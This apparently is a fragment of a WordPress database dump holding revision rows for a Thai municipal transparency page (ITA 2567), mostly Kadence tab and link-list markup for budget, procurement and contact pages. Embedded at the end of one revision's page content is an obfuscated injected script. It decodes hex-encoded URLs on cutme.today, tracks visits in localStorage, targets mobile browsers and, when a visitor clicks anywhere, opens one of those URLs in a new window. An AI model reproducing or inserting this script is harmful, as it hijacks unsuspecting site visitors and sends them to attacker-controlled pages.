{\"uniqueID\":\"871_921bc2-5c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-19 12:40:17','2024-08-19 05:40:17','',871,'http://pakhaeng.ssk.in.th/?p=883',0,'revision','',0),
(885,1,'2024-08-20 08:46:05','2024-08-20 01:46:05','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"var(\\u002d\\u002dglobal-palette4, #2D3748)\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette3, #1A202C)\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBgActive\":\"#0a6689\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-2 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 